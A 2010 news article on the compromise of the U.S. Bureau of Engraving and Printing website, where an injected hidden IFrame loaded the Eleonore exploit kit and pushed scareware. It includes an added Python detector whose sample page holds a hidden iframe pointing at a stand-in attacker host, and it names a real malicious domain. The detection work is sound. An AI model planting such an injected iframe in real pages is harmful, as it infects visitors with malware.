Part of a scareware distribution effort

May 4, 2010 14:29 GMT  ·  By

The website of the U.S. Department of the Treasury's Bureau of Engraving and Printing (BEP) was compromised by unknown attackers, who rigged it to infect visitors with malware. A malicious IFrame loading exploits from a third-party domain was injected into the site's index page, so anyone merely browsing to the home page would have the exploit content loaded without clicking anything.

The hack was discovered sometime on Sunday evening, but the affected website remained accessible for most of yesterday. While it was still online, the website could have been reached via three separate URLs: bep.treas.gov, bep.gov and moneyfactory.gov.

AVG was one of the first security vendors to report the compromise, through its Chief Research Officer, Roger Thompson, who revealed that a malicious IFrame had been injected into the government website. "This iframe is used to silently load one of the Eleonore exploit kit's main URLs, which in turn determines what's the best available exploitation method for the browser accessing the site," explain security researchers from Panda Security, who also analyzed the attack.
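As an added example (not code from the article, AVG or Panda), the following Python scanner shows how an injected IFrame of the kind described above can be flagged in a fetched page: it reports any frame whose source host is outside an allow-list of hosts the site legitimately frames, or that is rendered so the visitor cannot see it (zero/one-pixel dimensions or CSS hiding). The sample page, the allow-list and the `attacker.example` host are constructed for illustration; the real third-party domain is not reproduced here.

```python
"""Flag hidden or off-site <iframe> injections in an HTML page.

Added example, not the article's or any vendor's code. The sample page
and the attacker host below are constructed; they are not the real
injected frame.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS fragments attackers commonly use to keep an injected frame invisible.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes (lower-cased keys)."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser already lower-cases tag names
            self.frames.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True for width/height values of 0 or 1 (a common hiding trick)."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


def suspicious_iframes(html, trusted_hosts):
    """Return [(src, [reasons])] for frames that look injected.

    trusted_hosts: hostnames the site legitimately frames (itself and any
    known partners). A frame pointing at another host, or drawn so the
    user cannot see it, is reported with every reason that fired.
    Relative src values (same-site) are not treated as off-site.
    """
    trusted = {h.lower() for h in trusted_hosts}
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for frame in parser.frames:
        src = frame.get("src", "")
        host = urlparse(src).hostname
        reasons = []
        if host and host.lower() not in trusted:
            reasons.append("off-site source: " + host)
        if _tiny(frame.get("width")) or _tiny(frame.get("height")):
            reasons.append("zero/one-pixel frame")
        if HIDDEN_STYLE.search(frame.get("style", "")):
            reasons.append("hidden via CSS")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample: one legitimate video frame, one injected hidden frame.
SAMPLE_PAGE = """<html><head><title>Bureau of Engraving and Printing</title></head>
<body>
<iframe src="https://www.moneyfactory.gov/videos/player.html" width="640" height="360"></iframe>
<p>Welcome.</p>
<iframe src="http://attacker.example/in.php" width="1" height="1" style="display:none"></iframe>
</body></html>"""

# Hosts the site is assumed to frame legitimately (assumption for the example).
TRUSTED = ["www.moneyfactory.gov", "www.bep.gov", "bep.treas.gov"]

if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_PAGE, TRUSTED):
        print(src, "->", "; ".join(reasons))
```

Run against a copy of the index page pulled from the web server (or from the web root on disk, which catches injections before any visitor does), the check reports only the injected frame; a legitimate, visible, same-site frame produces no finding. In a real deployment the allow-list should come from the site owner, and a hit should trigger a diff of the page against a known-good copy rather than just an alert.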

Visitors are taken through a series of redirects that fingerprint the browser and its plug-ins to determine whether vulnerable software is installed. The exploit pack is able to target vulnerabilities in popular applications such as Adobe Reader or the Java Runtime Environment.

If exploitation is successful, websites displaying fake security scans are repeatedly opened in the browser to trick users into downloading and installing scareware. This is a generic name given to applications that masquerade as antivirus programs and try to scare people into paying a license fee by making false claims about alleged infections on their computers.

Panda analysts speculate that the attackers used a common attack technique, SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is supported by the use of the same malicious domain, grepad.com, in both attacks.

Images (2): Bureau of Engraving and Printing website compromised; Malicious IFrame injected into Bureau of Engraving and Printing website